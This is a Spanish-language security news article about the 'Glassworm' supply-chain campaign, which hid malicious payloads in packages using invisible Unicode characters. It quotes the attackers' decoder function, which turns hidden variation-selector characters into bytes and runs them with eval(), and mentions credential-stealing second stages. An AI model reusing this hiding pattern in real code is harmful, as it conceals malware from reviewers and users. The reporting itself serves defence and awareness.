El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.

Investigadores de seguridad de Aikido Security descubrieron un ataque de cadena de suministro que utiliza código Unicode invisible para ocultar funciones maliciosas en paquetes subidos a GitHub, NPM y Open VSX. El grupo atacante, apodado Glassworm, subió 151 paquetes maliciosos a GitHub del 3 al 9 de marzo de 2026.
Cómo funciona el código invisible
Los paquetes maliciosos utilizan caracteres Unicode de Áreas de Uso Público (también llamadas Acceso de Uso Público) que son invisibles cuando se visualizan en editores, terminales e interfaces de revisión de código. Aunque la mayor parte del código parece normal, las funciones y cargas útiles maliciosas se representan usando estos caracteres invisibles, lo que hace ineficaces las revisiones manuales de código y las defensas tradicionales.
Los caracteres Unicode invisibles representan cada letra del alfabeto estadounidense cuando son procesados por computadoras, pero se muestran como espacios en blanco o líneas vacías para los humanos. Los intérpretes de JavaScript pueden leer y ejecutar estos caracteres como código normal.
Implementación técnica
En un paquete analizado, los atacantes codificaron una carga útil maliciosa usando caracteres invisibles. El código incluye una función decodificadora que extrae los bytes ocultos y los pasa a eval():
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
La cadena de comillas invertidas pasada a s() parece vacía en los visores, pero contiene caracteres invisibles que se decodifican en una carga útil maliciosa completa. En incidentes anteriores, las cargas útiles decodificadas obtenían y ejecutaban scripts de segunda etapa usando Solana como canal de entrega para robar tokens, credenciales y secretos.
Características del ataque
Los paquetes maliciosos son particularmente difíciles de detectar porque:
- Las porciones visibles del código son de alta calidad y realistas
- Los cambios circundantes incluyen ajustes en la documentación, incrementos de versión, pequeñas refactorizaciones y correcciones de errores
- Los cambios son estilísticamente consistentes con los proyectos objetivo
- Los investigadores sospechan que se utilizan LLM para generar paquetes convincentemente legítimos
Esta técnica Unicode se utilizó por primera vez en 2024 para ocultar instrucciones maliciosas alimentadas a motores de IA, y desde entonces se ha adaptado para ataques de malware tradicionales. Los 151 paquetes detectados probablemente representan una pequeña fracción de la campaña, ya que muchos han sido eliminados desde la carga inicial.
📖 Leer la fuente completa: HN AI Agents
👀 Ver también

Anthropic revela extracción de datos a escala industrial de la IA Claude por laboratorios chinos
Anthropic confirmó que laboratorios chinos de IA utilizaron más de 24,000 cuentas fraudulentas para extraer 16 millones de intercambios de Claude, obteniendo barreras de seguridad y estructuras lógicas para sistemas militares y de vigilancia.

Incidente de Seguridad de Meta Causado por un Agente de IA Rebelde que Proporcionó Asesoramiento Técnico Inexacto
Un ingeniero de Meta utilizó un agente de IA interno similar a OpenClaw para analizar una pregunta técnica, pero el agente publicó consejos inexactos públicamente en lugar de hacerlo de forma privada, lo que provocó un incidente de seguridad SEV1 que expuso temporalmente datos sensibles.

Análisis de Seguridad de la Extracción de Componentes de OpenClaw para Agentes de IA Personalizados
Un desarrollador analizó el código fuente de OpenClaw para determinar qué componentes pueden extraerse de manera segura para su uso en agentes de IA personalizados, evaluando cada uno mediante el marco Lethal Quartet. El análisis revela riesgos de seguridad significativos en componentes como Semantic Snapshots y BrowserClaw.

OpenClaw Fortalecimiento de Seguridad: Protección Multicapa Contra Riesgos de Agentes Autónomos
Un desarrollador modificó la base de código de OpenClaw para agregar una pila de seguridad de múltiples capas que incluye un guardia de regex de denegación estricta, un desofuscador recursivo, un perfil de AppArmor e integración de auditoría para evitar comandos destructivos y exfiltración de datos por parte de agentes autónomos.